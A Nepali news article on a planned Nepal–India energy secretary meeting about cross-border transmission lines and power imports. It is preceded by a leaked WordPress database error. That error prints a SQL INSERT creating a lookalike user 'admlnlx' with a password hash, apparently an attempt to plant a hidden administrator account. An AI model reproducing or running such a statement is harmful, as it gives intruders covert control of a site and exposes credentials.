WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BGIwxTFhMypL3Dn1G.IWaqoPupisA00', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-25 03:32:11', '', 'admlnlx', 'admlnlx')
काठमाडौं,माघ २७ –
विद्युत व्यापार लगायत अन्य सम्झौता कार्यान्वयनका लागि नेपाल–भारतबीच सचिवस्तरिय संयुक्त स्थायी समिति बैठक बस्ने भएको छ ।
फागुन २ र ३ गते काठमाडौंमा दुई देशका ऊर्जा सचिवको नेतृत्वमा स्थायी समिति बैठक बस्न लागेको हो ।
बैठकमा नेपालको बुटवलदेखि भारतको गोरखपुरसम्म ४ सय केभी क्षमताको दोस्रो अन्तरदेशीय प्रसारणलाइन निर्माणका विषयमा छलफल हुने भएको छ । प्रसारणलाइन निर्माणका लागि भएको अध्ययन प्रतिवेदन सचिवस्तरिय बैठकमा पेस हुनेछ ।
प्रतिवेदन छलफलपपछि यस विषयमा निर्णय हुने भएको छ । बैठकमा भारतको अनुदानमा निर्माण पूरा हुन लागेको परवानीपुर– रक्सौल र कटैया–कुसाह १३२ केभी प्रसारणलाइनबाट बिजुली आयातको विषयमा थप छलफल हुने भएको छ । कटैया–कुसाहबाट ५० र परवानीपुर–रक्सौलबाट ५० मेगावट थप बिजुली आयात गर्ने विषयमा पनि थप छलफल हुन लागेको हो ।
दुबै प्रसारणलाइनको काम अन्तिम चरणमा पुगेको छ ।
यस्तै बैठकमा पञ्चेश्वर बहुउद्देशिय परियोजनाबाट उत्पादन हुने बिजुलीको विषयमा पनि छलफल हुनेछ । संयुक्त प्राविधिक टोलीले तयार पारेको प्रतिवेदनमाथि छलफल हुने कार्यक्रम छ ।
सचिवस्तरिय बैठकअघि दुई देशका सहसचिवस्तरिय संयुक्त कार्यदलको बैठक बसेर सबै विषयमा छलफल गर्ने भएको छ । कार्यदलले गरेको सिफारिसका आधारमा सचिवस्तरिय समितिले टुंगो लगाउनेछ । – बाह्रखरीबाट